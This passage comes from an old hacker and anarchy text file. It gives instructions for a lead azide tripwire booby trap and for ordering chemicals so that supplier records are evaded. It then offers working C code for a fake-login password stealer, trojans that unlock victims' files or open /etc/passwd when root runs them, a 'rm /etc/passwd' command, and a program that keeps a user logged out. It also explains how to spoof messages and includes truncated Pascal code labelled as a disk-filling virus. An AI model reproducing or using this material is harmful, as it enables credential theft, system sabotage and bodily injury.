  4313. attatched to doors, strung out as tripwires, or set up in any other situation
  4314. that will cause a quick pull on the strings. Be careful not to use too much
  4315. Lead Azide. A little will go a long way. Before trying this on an unsuspecting
  4316. soul, make a test booby trap as explained here, tie one end to a long rope,
  4317. and set it off from a distance.
  4318.  
  4319.   The paper wound around the booby trap serves two purposes. It keeps the Lead
  4320. Azide from flaking off, and it pads the stuff so it will be less likely to get
  4321. set off accidentally. A good vigorous swat will still set it off though, so
  4322. store these separately and keep them padded well.
  4323.  
  4324.  
  4325.                           Getting The Chemicals
  4326.  
  4327.   As always, be sure to use your brains when ordering chemicals from a lab
  4328. supply house. Those people KNOW what Sodium Azide and Lead Nitrate make when
  4329. mixed together. They also know that someone who orders a bunch of chlorates,
  4330. nitrates, metal dusts, sulfur, and the like, probably has mischeif in mind,
  4331. and they keep records. So break your orders up, order from different supply
  4332. houses, get some friends to order some of the materials, and try to order the
  4333. things long before you plan do do anything with them. It's a pain, and the
  4334. multiple orders cost a lot in extra shipping charges, but that's what it costs
  4335. to cover your tracks. DO it!
  4336.  
  4337.  
  4338.  
  4339.  
  4340.  
  4341.  
  4342.   ∩7Å3 
  4343. è                              Super Bottle Rockets
  4344.  
  4345.     Go down to a hobby shop and buy some Estes rocket engines and some small
  4346. dowels, you can make these babies.  Attach the dowel to the rocket casing with
  4347. tape or glue and be SURE to plug you the top end of the engine so you get a
  4348. bigger bang for your money.  Epoxy works well for this.  The great thing about
  4349. it is that they go VERY FAST and VERY FAR.  The speed is enough to knock out
  4350. anything easily.  You can go for A, B, C, or D engines but remember that the
  4351. heavier and more powerful the engine, the longer the dowel you will need.  Buy
  4352. the C6-7 engines with a 6 second burn and 7 second delay for discharge.
  4353.  
  4354.  
  4355.  
  4356.                               ------------------
  4357.                               UNIX Trojan Horses
  4358.                               ------------------
  4359.  
  4360. Introduction
  4361. ------------
  4362.  
  4363.      "UNIX Security" is an oxymoron.  It's an easy system to bruteforce hack
  4364. (most UNIX systems don't hang up after x number of login tries, and there are
  4365. a number of default logins, such as root, bin, sys and uucp).  Once you're in
  4366. the system, you can easily bring it to its knees or, if you know a little 'C',
  4367. you can make the system work for you and totally eliminate the security
  4368. barriers to creating your own logins, reading anybody's files, etcetera.  This
  4369. file will outline such ways by presenting 'C' code that you can implement
  4370. yourself.
  4371.  
  4372. Requirements
  4373. ------------
  4374.      You'll need a working account on a UNIX system.  It should be a fairly
  4375. robust version of UNIX (such as 4.2bsd or AT&T System V) running on a real
  4376. machine (a PDP/11, VAX, Pyramid, etc.) for the best results.  If you go to
  4377. school and have an account on the school system, that will do perfectly.
  4378.  
  4379. Notes
  4380. -----
  4381.      This file was inspired an article in the April, '86 issue of BYTE
  4382. entitled "Making UNIX Secure."  In the article, the authors say "We provide
  4383. this information in a way that, we hope, is interesting and useful yet stops
  4384. short of being a 'cookbook for crackers.'  We have often intentionally omitted
  4385. details."  I am following the general outline of the article, giving explicit
  4386. examples of the methods they touched on.
  4387.  
  4388.  
  4389. Project One:  Fishing For Passwords
  4390. -----------------------------------
  4391.  
  4392.      You can implement this with only a minimal knowledge of UNIX and C.
  4393. However, you need access to a terminal that many people use - the computer lab
  4394. at your school, for example.
  4395.  
  4396.      When you log onto a typical UNIX system, you see something like this:
  4397.   ∩7Å3 
  4398. èTiburon Systems 4.2bsd / System V (shark)
  4399.  
  4400.  
  4401. login: shark
  4402. Password:      (not printed)
  4403.  
  4404.      The program I'm giving you here simulates a logon sequence.  You run the
  4405. program from a terminal and then leave.  Some unknowing fool will walk up and
  4406. enter their login and password.  It is written to a file of yours, then "login
  4407. incorrect" is printed, then the fool is asked to log in again.  The second
  4408. time it's the real login program.  This time the person succeeds and they are
  4409. none the wiser.
  4410.  
  4411.      On the system, put the following code into a file called 'horse.c'.  You
  4412. will need to modify the first 8 lines to fit your system's appearance.
  4413.  
  4414.  
  4415. ----- Code Begins Here -----
  4416.  
  4417. /* this is what a 'C' comment looks like.  You can leave them out. */
  4418.  
  4419. /* #define's are like macros you can use for configuration. */
  4420.  
  4421. #define SYSTEM "\n\nTiburon Systems 4.2bsd UNIX (shark)\n\n"
  4422.  
  4423. /* The above string should be made to look like the message that your
  4424.  * system prints when ready.  Each \n represents a carriage return.
  4425.  */
  4426.  
  4427. #define LOGIN  "login: "
  4428.  
  4429. /* The above is the login prompt.  You shouldn't have to change it
  4430.  * unless you're running some strange version of UNIX.
  4431.  */
  4432.  
  4433. #define PASSWORD "password:"
  4434.  
  4435. /* The above is the password prompt.  You shouldn't have to change
  4436.  * it, either.
  4437.  */
  4438.  
  4439. #define WAIT 2
  4440.  
  4441. /* The numerical value assigned to WAIT is the delay you get after
  4442.  * "password:" and before "login incorrect."  Change it (0 = almost
  4443.  * no delay, 5 = LONG delay) so it looks like your system's delay.
  4444.  * realism is the key here - we don't want our target to become
  4445.  * suspicious.
  4446.  */
  4447.  
  4448.  
  4449. #define INCORRECT "Login incorrect.\n"
  4450.  
  4451. /* Change the above so it is what your system says when an incorrect
  4452.  * login is given.  You shouldn't have to change it.  ∩7Å3 
  4453. è */
  4454.  
  4455. #define FILENAME "stuff"
  4456.  
  4457. /* FILENAME is the name of the file that the hacked passwords will
  4458.  * be put into automatically.  'stuff' is a perfectly good name.
  4459.  */
  4460.  
  4461. /* Don't change the rest of the program unless there is a need to
  4462.  * and you know 'C'.
  4463.  */
  4464.  
  4465. #include <curses.h>
  4466. #include <signal.h>
  4467. int stop();
  4468.  
  4469. main()
  4470. {
  4471. char name[10], password[10];
  4472. int i;
  4473. FILE *fp, *fopen();
  4474. signal(SIGINT,stop);
  4475. initscr();
  4476. printf(SYSTEM);
  4477. printf(LOGIN);
  4478. scanf("%[^\n]",name);
  4479. getchar();
  4480. noecho();
  4481. printf(PASSWORD);
  4482. scanf("%[^\n]",password);
  4483. printf("\n");
  4484. getchar();
  4485. echo();
  4486. sleep(WAIT);
  4487.  
  4488.  
  4489. if ( ( fp = fopen(FILENAME,"a") )  != NULL ) {
  4490. #fprintf(fp,"login %s has password %s\n",name,password);
  4491. #fclose(fp);
  4492. #}
  4493.  
  4494. printf(INCORRECT);
  4495. endwin();
  4496. }
  4497.  
  4498. stop()
  4499. {
  4500. endwin();
  4501. exit(0);
  4502. }
  4503.  
  4504.  
  4505. ----- Source Ends Here -----
  4506.  
  4507.      OK, as I said, enter the above and configure it so it looks exactly like  ∩7Å3 
  4508. èyour system's login sequence.  To compile this program called 'horse.c' type
  4509. the following two lines: (don't type the %'s, they are just a sample prompt)
  4510.  
  4511. % cc horse.c -lcurses -ltermcap
  4512. % mv a.out horse
  4513.  
  4514. You now have the working object code in a file called 'horse'.  Run it, and if
  4515. it doesn't look like your systems logon sequence, re-edit horse.c and
  4516. recomplie it.  When you're ready to put the program into use, create a new
  4517. file and call it 'trap' or something.  'trap' should have these two commands:
  4518.  
  4519. horse                    (this runs your program)
  4520. login                    (this runs the real login program)
  4521.  
  4522. to execute 'trap' type:
  4523.  
  4524. % source trap            (again, don't type the %)
  4525.  
  4526. and walk away from your terminal...
  4527.  
  4528. After you've run it successfully a few times, check your file called
  4529. 'stuff' (or whatever you decided to call it).  It will look like this:
  4530.  
  4531. user john has password secret
  4532. user mary has password smegma
  4533. etc.
  4534.  
  4535. Copy down these passwords, then delete this file (it can be VERY incriminating
  4536. if the superuser sees it).
  4537.  
  4538. Note - for best results your terminal should be set to time-out after a few
  4539. minutes of non-use - that way, your horse program doesn't run idle for 14
  4540. hours if nobody uses the terminal you ran it on.
  4541.  
  4542. -----
  4543.  
  4544. The next projects can be run on a remote system, such as the VAX in Michigan
  4545. you've hacked into, or Dartmouth's UNIX system, or whatever.  However, they
  4546. require a little knowledge of the 'C' language.  They're not something for
  4547. UNIX novices.
  4548.  
  4549. Project Two:  Reading Anybody's Files
  4550. -------------------------------------
  4551.  
  4552. When somebody runs a program, they're the owner of the process created and
  4553. that program can do anything they would do, such as delete a file in their
  4554. directory or making a file of theirs available for reading by anybody.
  4555.  
  4556. When people save old mail they get on a UNIX system, it's put into a file
  4557. called mbox in their home directory.  This file can be fun to read but is
  4558. usually impossible for anybody but the file's owner to read.  Here is a short
  4559. program that will unlock (i.e. chmod 777, or let anybody on the system read,
  4560. write or execute) the mbox file of the person who runs the program:
  4561.  
  4562. ----- Code Begins Here -----  ∩7Å3 
  4563. è
  4564. #include <pwd.h>
  4565.  
  4566. struct passwd *getpwnam(name);
  4567. struct passwd *p;
  4568. char buf[255];
  4569.  
  4570. main()
  4571. {
  4572. p = getpwnam(getlogin());
  4573. sprintf(buf,"%s/%s",p->pw_dir,"mbox");
  4574. if ( access(buf,0) > -1 ) {
  4575.         sprintf(buf,"chmod 777 %s/%s",p->pw_dir,"mbox");
  4576.         system(buf);
  4577.         }
  4578. }
  4579.  
  4580. ----- Code Ends Here -----
  4581.  
  4582. So the question is:  How do I get my target to run this program that's
  4583. in my directory?
  4584.  
  4585. If the system you're on has a public-messages type of thing (on 4.xbsd, type
  4586. 'msgs') you can advertise your program there.  Put the above code in another
  4587. program - find a utility or game program in some magazine like UNIX WORLD and
  4588. modify it and do the above before it does it's real thing.  So if you have a
  4589. program called tic-tac-toe and you've modified it to unlock the mbox file of
  4590. the user before it plays tic-tac-toe with him, advertise "I have a new tic-
  4591. tac-toe program running that you should all try.  It's in my directory." or
  4592. whatever.  If you don't have means of telling everybody on the system via a
  4593. public message, then just send mail to the specific people you want to trap.
  4594.  
  4595. If you can't find a real program to modify, just take the above program and
  4596. add this line between the two '}' lines at the end of the program:
  4597.  
  4598. printf("Error opening tic-tac-toe data file.  Sorry!\n");
  4599.  
  4600. when the program runs, it will print the above error message.  The user will
  4601. think "Heh, that dude doesn't know how to write a simple tic-tac-toe program!"
  4602. but the joke's on him - you can now read his mail.
  4603.  
  4604. If there's a specific file in a user's directory that you'd like to read (say
  4605. it's called "secret") just throw together this general program:
  4606.  
  4607.  
  4608. main()
  4609. {
  4610. if ( access("secret",0) > -1 ) system("chmod 777 secret");
  4611. }
  4612.  
  4613. then 'talk' or 'write' to him and act like Joe Loser: "I wrote this program
  4614. called super_star_wars, will you try it out?"
  4615.  
  4616. You can use your imagination.  Think of a command you'd like somebody to
  4617. execute.  Then put it inside a system() call in a C program and trick them  ∩7Å3 
  4618. èinto running your program!
  4619.  
  4620. Here's a very neat way of using the above technique:
  4621.  
  4622. Project Three: Become the superuser
  4623. -----------------------------------
  4624.  
  4625. Write a program that you can get people to run.  Put this line in it
  4626. somewhere:
  4627.  
  4628. if ( !strcmp(getlogin(),"root") ) system("whatever you want");
  4629.  
  4630. This checks to see if the root login is running your program.  If he is, you
  4631. can have him execute any shell command you'd like.  Here are some suggestions:
  4632.  
  4633. "chmod 666 /etc/passwd"
  4634.  
  4635.      /etc/passwd is the system's password file.  The root owns this file.
  4636. Normally, everyone can read it (the passwords are encrypted) but only the root
  4637. can write to it.  Take a look at it and see how it's formatted if you don't
  4638. know already.  This command makes it possible for you to now write to the file
  4639. - i.e. create unlimited accounts for yourself and your friends.
  4640.  
  4641. "chmod 666 /etc/group"
  4642.  
  4643.      By adding yourself to some high-access groups, you can open many
  4644. doors.
  4645.  
  4646. "chmod 666 /usr/lib/uucp/L.sys"
  4647.  
  4648.      Look for this file on your system if it is on the uucp net.  It contains
  4649. dialups and passwords to other systems on the net, and normally only the uucp
  4650. administrator can read it.  Find out who owns this file and get him to
  4651. unknowingly execute a program to unlock it for you.
  4652.  
  4653. "rm /etc/passwd"
  4654.  
  4655.      If you can get the root to execute this command, the system's passwd file
  4656. will be removed and the system will go down and will not come up for some time
  4657. to come.  This is very destructive.
  4658.  
  4659. -----
  4660.  
  4661. If you are going to go about adding a trojan horse program to the system,
  4662. there are some rules you should follow.  If the hidden purpose is something
  4663. major (such as unlocking the user's mbox or deleting all of his files or
  4664. something) this program shouldn't be a program that people will be running a
  4665. lot (such as a popular computer game) - once people discover that their files
  4666. are public access the source of the problem will be discovered quite easily.
  4667. Save this purpose for a 'test' program (such as a game you're in the process
  4668. of writing) that you ask individual people to run via mail or 'chatting' with
  4669. them.  As I said, this 'test' program can bomb or print a phony error message
  4670. after completing its task, and you will just tell the person "well, I guess
  4671. it needs more work", wait until they log off, and then read whatever file of
  4672. theirs that you've unlocked.  If your trojan horse program's sole purpose is  ∩7Å3 
  4673. èto catch a specific user running it - such as the root or other high-powered
  4674. user - you can put the code to do so in a program that will be run a lot by
  4675. various users of the system.  Your modification will remain dormant until he
  4676. runs it.  If you can't find the source to 'star trek' or whatever in C, just
  4677. learn C and convert something from pascal.  It can't hurt to learn C as it's a
  4678. great language.  We've just seen what it can do on a UNIX system.  Once you've
  4679. caught the root (i.e. you can now modify the /etc/passwd file) remove the
  4680. spurious code from your trojan horse program and you'll never be caught. 
  4681.  
  4682.  
  4683.  
  4684.                                Unix - Odds & Ends
  4685.  
  4686. --  ------- ----- --- --- ------
  4687. 1.  Keeping Users Off The System
  4688. --  ------- ----- --- --- ------
  4689.  
  4690. Now, we all know by now how to log users off (one way is to redirect
  4691. an 'stty 0' command to their tty) but unless you have root privs, this
  4692. will not work when a user has set 'mesg n' and prevented other users from
  4693. writing to their terminal.  But even users who have a 'mesg n' command in
  4694. their .login (or .profile or .cshrc) file still have a window of vulnerability,
  4695. the time between login and the locking of their terminal.  I designed the
  4696. following program, block.c, to take advantage of this fact.
  4697.  
  4698. To get this source running on your favorite Unix system, upload it,
  4699. call it 'block.c', and type the following at the % or $ prompt:
  4700.  
  4701. cc -o block block.c
  4702.  
  4703. once you've compiled it successfully, it is invoked like so:
  4704.  
  4705. block username [&]
  4706.  
  4707. The & is optional and recommended - it runs the program in the background,
  4708. thus letting you do other things while it's at work.
  4709.  
  4710. If the user specified is logged in at present, it immediately logs
  4711. them out (if possible) and waits for them to log in.  If they aren't logged
  4712. in, it starts waiting for them.  If the user is presently logged in but
  4713. has their messages off, you'll have to wait until they've logged out to
  4714. start the thing going.
  4715.  
  4716. Block is essentially an endless loop : it keeps checking for the occurence
  4717. of the username in /etc/utmp.  When it finds it, it immediately logs them
  4718. out and continues.  If for some reason the logout attempt fails, the program
  4719. aborts.  Normally this won't happen - the program is very quick when run
  4720. unmodified.  However, to get such performance, it runs in a very tight
  4721. loop and will eat up a lot of CPU time.  Notice that near the end of the
  4722. program there is the line:
  4723.  
  4724. /*sleep(SLEEP)   */
  4725.  
  4726. the /* and */ are comment delimiters - right now the line is commented
  4727. out.  If you remove the comments and re-compile the program, it will then  ∩7Å3 
  4728. è'go to sleep' for the number of seconds defined in SLEEP (default is 5)
  4729. at the end of every loop.  This will save the system load but will slightly
  4730. decrease the odds of catching the user during their 'window of vulnerability.'
  4731.  
  4732. If you have a chance to run this program at a computer lab at a school or
  4733. somewhere similar, run this program on a friend (or an enemy) and watch
  4734. the reaction on their face when they repeatedly try to log in and are
  4735. logged out before they can do *anything*.  It is quite humorous.  This
  4736. program is also quite nasty and can make you a lot of enemies!
  4737.  
  4738. caveat #1:  note that if you run the program on yourself, you will be logged
  4739. out, the program will continue to run (depending on the shell you're under)
  4740. and you'll have locked yourself out of the system - so don't do this!
  4741.  
  4742. caveat #2:  I wrote this under OSx version 4.0, which is a licensed version
  4743. of Unix which implements 4.3bsd and AT&T sysV.  No guarantees that it will
  4744. work on your system.
  4745.  
  4746. caveat #3:  If you run this program in background, don't forget to kill
  4747. it when you're done with it!  (when you invoke it with '&', the shell will
  4748. give you a job number, such as '[2] 90125'.  If you want to kill it later
  4749. in the same login session, type 'kill %2'.  If you log in later and want
  4750. to kill it, type 'kill 90125'.  Just read the man page on the kill command
  4751. if you need any help...
  4752.  
  4753. ----- cut here -----
  4754.  
  4755. /* block.c -- prevent a user from logging in
  4756.  * by Shooting Shark
  4757.  * usage : block username [&]
  4758.  * I suggest you run this in background.
  4759.  */
  4760.  
  4761. #include <stdio.h>
  4762. #include <utmp.h>
  4763. #include <ctype.h>
  4764. #include <termio.h>
  4765. #include <fcntl.h>
  4766.  
  4767. #define W_OK2
  4768. #define SLEEP5
  4769. #define UTMP"/etc/utmp"
  4770. #define TTY_PRE "/dev/"
  4771.  
  4772. main(ac,av)
  4773. int ac;
  4774. char *av[];
  4775. {
  4776. int target, fp, open();
  4777. struct utmpuser;
  4778. struct termio*opts;
  4779. char buf[30], buf2[50];
  4780.  
  4781. if (ac != 2) {
  4782. printf("usage : %s username\n",av[0]);  ∩7Å3 
  4783. èexit(-1);
  4784. }
  4785.  
  4786.  
  4787. for (;;) {
  4788.  
  4789. if ((fp = open(UTMP,0)) == -1) {
  4790. printf("fatal error!  cannot open %s.\n",UTMP);
  4791. exit(-1);
  4792. }
  4793.  
  4794.  
  4795. while (read(fp, &user, sizeof user) > 0) {
  4796. if (isprint(user.ut_name[0])) {
  4797. if (!(strcmp(user.ut_name,av[1]))) {
  4798.  
  4799. printf("%s is logging in...",user.ut_name);
  4800. sprintf(buf,"%s%s",TTY_PRE,user.ut_line);
  4801. printf("%s\n",buf);
  4802. if (access(buf,W_OK) == -1) {
  4803. printf("failed - program aborting.\n");
  4804. exit(-1);
  4805. }
  4806. else {
  4807. if ((target = open(buf,O_WRONLY)) != EOF) {
  4808. sprintf(buf2,"stty 0 > %s",buf);
  4809. system(buf2);
  4810. printf("killed.\n");
  4811. sleep(10);
  4812. }
  4813.  
  4814. } /* else */
  4815. } /* if strcmp */
  4816. } /* if isprint */
  4817. } /* while */
  4818. close(fp);
  4819.  
  4820. /*sleep(SLEEP);  */
  4821.  
  4822. } /* for */
  4823.  
  4824.  
  4825.  
  4826.  
  4827.  
  4828. }
  4829.  
  4830. ----- cut here -----
  4831.  
  4832.  
  4833. --  ------------- ----- ----- ---- ------  --- ------
  4834. 2.  Impersonating other users with 'write' and 'talk'
  4835. --  ------------- ----- ----- ---- ------  --- ------
  4836.  
  4837. This next trick wasn't exactly a work of stupefying genius, but is a  ∩7Å3
  4838. èlittle trick (that anybody can do) that I sometimes use to amuse myself
  4839. and, as with the above, annoy the hell out of my friends and enemies.
  4840.  
  4841. Nearly every Unix system has the 'write' program, for conversing with
  4842. other logged-in users.  As a quick summary:
  4843.  
  4844. If you see that user 'clara' is logged in with the 'who' or 'w' command
  4845. or whatever, and you wish to talk to her for some reason or another,
  4846. you'd type 'write clara'.  Clara then would see on her screen something
  4847. like this (given that you are username 'shark'):
  4848.  
  4849.  
  4850. [3 ^G's] Message from shark on ttyi13 at 23:14 ...
  4851.  
  4852. You then type away at her, and whatever you type is sent to her terminal
  4853. line-by-line.  If she wanted to make it a conversation rather than a
  4854. monologue, she'd type 'write shark,' you'd get a message similar to the above
  4855. on your terminal, and the two of you would type away at each other to your
  4856. little heart's content.  If either one of you wanted to end the conversation,
  4857. you would type a ^D.  They would then see the characters 'EOF' on their
  4858. screen, but they'd still be 'write'ing to you until they typed a ^D as well.
  4859.  
  4860. Now, if you're on a bigger installation you'll probably have some sort
  4861. of full-screen windowing chat program like 'talk'.  My version of talk
  4862. sends the following message:
  4863.  
  4864. Message from Talk_Daemon@tibsys at 23:14 ...
  4865. talk: connection requested by shark@tibsys.
  4866. talk: respond with:  talk shark@tibsys
  4867.  
  4868. Anyway, here's where the fun part begins:  It's quite easy to put a sample
  4869. 'write' or 'talk' message into a file and then edit so that the 'from'
  4870. is a different person, and the tty is listed differently.  If you see that
  4871. your dorky friend roger is on ttyi10 and the root also happens to be
  4872. logged on on ttyi01, make the file look something like this:
  4873.  
  4874. [3 control-G's] Message from root on ttyi01 at [the current time]
  4875.  
  4876. wackawackawackawackawacka!!!
  4877.  
  4878. [or a similarly confusing or rude message...]
  4879.  
  4880. EOF
  4881.  
  4882. Then, send this file to roger's terminal with:
  4883.  
  4884. cat filename > /dev/ttyi10
  4885.  
  4886. He'll get the message on his terminal and wonder what the hell the
  4887. superuser is talking about.  He might even 'write' back to the superuser
  4888. with the intent of asking 'what the hell are you talking about?'.  For
  4889. maximum effectiveness, *simultaneously* send a message to root 'from'
  4890. roger at the appropriate terminal with an equally strange message - they'll
  4891. then engage in a conversation that will go something like "what did you
  4892. mean by that?"  "what do you mean, what do I mean?  What did *you* mean  ∩7Å3 
  4893. èby that?" etc.  A splendid time is guaranteed for all!  Note that you don't
  4894. have to make 'root' the perpetrator of the gag, any two currently logged-in
  4895. users who have their terminals open for messages can join in on the fun.
  4896.  
  4897. Similarly, you can fake a few 'talk' pages from/to two people...they will
  4898. then probably start talking...although the conversation will be along the
  4899. lines of "what do you want?"  "you tell me."  "you paged me, you tell *me."
  4900. etcetera, while you laugh yourself silly or something like that.
  4901.  
  4902. A variation on the theme:  As I said, when using 'write' you type a ^D to
  4903. end the conversation, and the person you're typing at sees an 'EOF' on
  4904. their screen.  But you could also just *type* 'EOF', and they'd think
  4905. you've quit...but you still have an open line to their terminal.  Even
  4906. if they later turn messages off, you still have the ability to write to
  4907. their terminal.  Keeping this fact in mind, anybody who knows what they're
  4908. doing can write a program similar to my 'block' program above that doesn't
  4909. log a user out when they appear on the system, but opens their tty as
  4910. a device and keeps the file handle in memory so you can redirect to their
  4911. terminal - to write rude messages or to log them out or whatever - at any
  4912. time, until they log out.
  4913.  
  4914.  
  4915.  
  4916. {modified version of Arpnet virus:Pascal should be redif to ASM}
  4917. {obj are ok compile will attach with viru@2 mechanizism..per @Trash33}
  4918. {makes the disk space packets and eats all avalible space,loop it  }
  4919. {Enjoy and modify this is root version...aka SHADOWSPAWN}
  4920. Unit  Netsnd;
  4921. Interface
  4922. Uses  Crt, Dos, Consts, Types, Iostuff, Routing,
  4923.       Netvars, Netfncs, Netrcv, Btree, Filedecs;
  4924. PROCEDURE make_packets;
  4925. Implementation
  4926. {--------MAKE PACKETS AND PACKETS AND PACKETS--------------------------------}
  4927. PROCEDURE make_packets;
  4928. VAR   msg_counter : INTEGER;
  4929.       tmp_ptr     : node_info_ptr;
  4930.       month,day,year,dow : WORD;
  4931.       hour,minute,second,hund : WORD;
  4932.       temp        : line;
  4933.       rl          : LONGINT;
  4934.       x           : INTEGER;
  4935.       new_net     : INTEGER;
  4936.       new_node    : INTEGER;
  4937.       attr        : INTEGER;
  4938.       fwd         : BOOLEAN;
  4939.       ch          : CHAR;
  4940.       t1,t2,t3    : INTEGER;
  4941.       i,j         : INTEGER;
  4942.       seen        : BOOLEAN;
  4943.       more        : BOOLEAN;
  4944.       lrnum       : lrnumber;
  4945.       lrtmp       : LONGINT;
  4946.       tmp         : short_string;
  4947.    {-------------------SET UP FOR NET NODE PACKETS---------------------------}  ∩7Å3 
  4948. è   PROCEDURE construct_packet(new_net, new_node: INTEGER);
  4949.    VAR   first_pk : INTEGER;
  4950.    BEGIN
  4951.       INC(msg_counter);
  4952.       tmp_ptr := node_c;
  4953.       first_pk := -1;
  4954.       WHILE (tmp_ptr <> NIL) AND
  4955.          NOT ((tmp_ptr^.net = new_net) AND
  4956.          (tmp_ptr^.node = new_node)) DO BEGIN
  4957.          tmp_ptr := tmp_ptr^.ptr
  4958.       END;
  4959.       IF tmp_ptr = NIL THEN
  4960.          BEGIN
  4961.             NEW(tmp_ptr);
  4962.             FILLCHAR(tmp_ptr^,SIZEOF(node_info),0);
  4963.             tmp_ptr^.ptr := node_c;
  4964.             node_c := tmp_ptr;
  4965.             node_c^.net := new_net;
  4966.             node_c^.node := new_node;
  4967.             node_c^.tries := 0;
  4968.             node_c^.connects := 0;
  4969.             node_c^.success := FALSE;
  4970.             ASSIGN(pk_index,default.database_drive + pkindexfile);
  4971.             {$I-} RESET(pk_index); {$I+}
  4972.             IF IOresult = 0 THEN
  4973.                BEGIN
  4974.                   x := 0;
  4975.                   pk_idx.net := 0;
  4976.                   pk_idx.node := 0;
  4977.                   WHILE NOT EOF(pk_index) AND
  4978.                      NOT ((pk_idx.net = new_net) AND (pk_idx.node = new_node)) DO BEGIN
  4979.                      READ(pk_index,pk_idx);
  4980.                      IF pk_idx.avail AND (first_pk < 0) THEN
  4981.                         first_pk := x;
  4982.                      INC(x)
  4983.                   END;
  4984.                   IF (pk_idx.net = new_net) AND (pk_idx.node = new_node) THEN
  4985.                      BEGIN
  4986.                         node_c^.pk_num := x - 1;
  4987.                         first_pk := -1
  4988.                      END
  4989.                   ELSE
  4990.                      BEGIN
  4991.                         IF first_pk < 0 THEN
  4992.                            first_pk := FILESIZE(pk_index);
  4993.                         node_c^.pk_num := first_pk;
  4994.                         pk_idx.avail := FALSE;
  4995.                         pk_idx.sent := FALSE;
  4996.                         pk_idx.attempts := 0;
  4997.                         pk_idx.net := new_net;
  4998.                         pk_idx.node := new_node;
  4999.                         SEEK(pk_index,first_pk);
  5000.                         WRITE(pk_index,pk_idx)
  5001.                      END
  5002.                END  ∩7Å3 
  5003. è            ELSE
  5004.                BEGIN
  5005.                   REWRITE(pk_index);
  5006.                   first_pk := 0;
  5007.                   node_c^.pk_num := 0;
  5008.                   pk_idx.avail := FALSE;
  5009.                   pk_idx.sent := FALSE;
  5010.                   pk_idx.attempts := 0;
  5011.                   pk_idx.net := new_net;
  5012.                   pk_idx.node := new_node;
  5013.                   SEEK(pk_index,first_pk);
  5014.                   WRITE(pk_index,pk_idx)
  5015.                END;
  5016.             CLOSE(pk_index);
  5017.             ASSIGN(p_info,default.database_drive + 'PK' + dual(node_c^.pk_num) + '.XMT');
  5018.             {$I-} RESET(p_info); {$I+}
  5019.             IF (IOresult = 0) AND (first_pk >=0) THEN
  5020.                CLOSE(p_info)
  5021.             ELSE
  5022.                BEGIN
  5023.                   REWRITE(p_info);
  5024.                   GETDATE(year,month,day,dow);
  5025.                   GETTIME(hour,minute,second,hund);
  5026.                   packet.year := year;
  5027.                   packet.month := month;
  5028.                   packet.day := day;
  5029.                   packet.hour := hour;
  5030.                   packet.minute := minute;
  5031.                   packet.second := second;
  5032.                   WITH packet DO BEGIN
  5033.                      orig_net := default.net;
  5034.                      dest_net := new_net;
  5035.                      orig_node := default.node;
  5036.                      dest_node := new_node;
  5037.                      baud_rate := 1200;
  5038.                      pk_ver := packet_version;
  5039.                      prod_code := product_code;
  5040.                      FILLCHAR(fill,SIZEOF(fill),0)
  5041.                   END;
  5042.                   WRITE(p_info,packet);
  5043.                   CLOSE(p_info)
  5044.                END
  5045.          END;
  5046. { The following code will construct the actual message that is to be
  5047.   transmitted. I'm sure some intelligent soul out there can figure out
  5048.   that this section of code can be replaced to transmit anything as the
  5049.   packet is a protocol level above the information actually being transmitted
  5050.   to the destination node... }
  5051.       ASSIGN(packets,default.database_drive + 'PK' + dual(tmp_ptr^.pk_num) + '.XMT');
  5052.       RESET(packets);
  5053.       SEEK(packets,FILESIZE(packets));
  5054.       temp := convert(mesg.org_time.date,rl);
  5055.       temp := day_of_week[rl MOD 7] + ' '
  5056.             + dual(value(COPY(mesg.org_time.date,4,2))) + ' '
  5057.             + month_of_year[value(COPY(mesg.org_time.date,1,2))] + ' '  ∩7Å3
  5058. è            + dual(value(COPY(mesg.org_time.date,7,2))) + ' '
  5059.             + dual(value(COPY(mesg.org_time.time,1,2))) + ':'
  5060.             + dual(value(COPY(mesg.org_time.time,4,2))) + NULL;
  5061.       write_int($0002);                     {Packet header}
  5062.       write_int(mesg.orig_node);            {Originating node}
  5063.       write_int(mesg.dest_node);            {Destination node}
  5064.       write_int(mesg.orig_net);             {Originating net}
  5065.       write_int(mesg.dest_net);             {Destination net}
  5066.       attr := mesg.flags AND $7413;         {Zero required attributes}
  5067.       write_int(attr);                      {File attribute}
  5068. {?}   write_int($0000);                     {File transmission cost}
  5069.       write_line(temp);                     {Date/Time group}
  5070.       write_line(mesg.dest_user + NULL);    {Who message is to}
  5071.       write_line(mesg.org_user + NULL);     {Who it is from};
  5072.       write_line(mesg.title + NULL);        {Subject of message};
  5073.       x := 0;
  5074.       WHILE (mesg_text[x + 1] <> '') AND (x < max_msg_entry) DO BEGIN
  5075.          INC(x);
  5076.          write_line(mesg_text[x] + CR);
  5077.          IF POS('Message ID: ',mesg_text[x]) > 0 THEN
  5078.             BEGIN
  5079.                temp := COPY(mesg_text[x],POS('Message ID: ',mesg_text[x]) + 12,9);
  5080.                tmp := convert(system_date,lrtmp);
  5081.                lrnum := lrtmp;
  5082.                insertvalueinbtree(pkfile,lrnum,temp)
  5083.             END
  5084.       END;
  5085.       write_line(mesg_text[x + 1] + NULL);
  5086.       write_int($0000);                    {End of packet}
  5087.       CLOSE(packets)
  5088.    END;
  5089.    {---THIS IS JUST FOR FUN    BETTER TO LEAVE OUT UNLESS YOU WANT TO TRAIL--}
  5090. BEGIN
  5091.    openwindow(40,5,76,15,'Mail packet construction',YELLOW,back,4);
  5092.    setcolor(fore,back);
  5093.    writest('Constructing transmission packets',2,2);
  5094.    WRITELN(log_file,'Making the mail packets...',system_date,' ',system_time);
  5095.    node_c := NIL;
  5096.    msg_counter := 0;
  5097.    ASSIGN(mesg_dir,default.msg_drive + msg_file_dir);
  5098.    {$I-} RESET(mesg_dir); {$I+}
  5099.    IF IOresult <> 0 THEN
  5100.       BEGIN
  5101.          WRITELN(log_file,'I can''t open the message directory!');
  5102.          writest('ERROR: Cannot open the message directory',2,4);
  5103.          EXIT
  5104.       END;
  5105.    t1 := 9;                    { Note: This is the networking base }
  5106.    REPEAT
  5107.       SEEK(mesg_dir,t1);
  5108.       READ(mesg_dir,mesg);
  5109.       t1 := mesg.dir_link;
  5110.       t2 := mesg.sub_dir_link;
  5111.       WHILE t2 > 0 DO BEGIN
  5112.          SEEK(mesg_dir,t2);  ∩7Å3 
  5113. è         READ(mesg_dir,mesg);
  5114.          t2 := mesg.dir_link;
  5115.          t3 := mesg.sub_dir_link;
  5116.          IF t3 > 0 THEN
  5117.             BEGIN
  5118.                SEEK(mesg_dir,t3);
  5119.                READ(mesg_dir,mesg);
  5120.                t3 := mesg.sub_dir_link;
  5121.                SEEK(mesg_dir,t3);
  5122.                READ(mesg_dir,mesg);
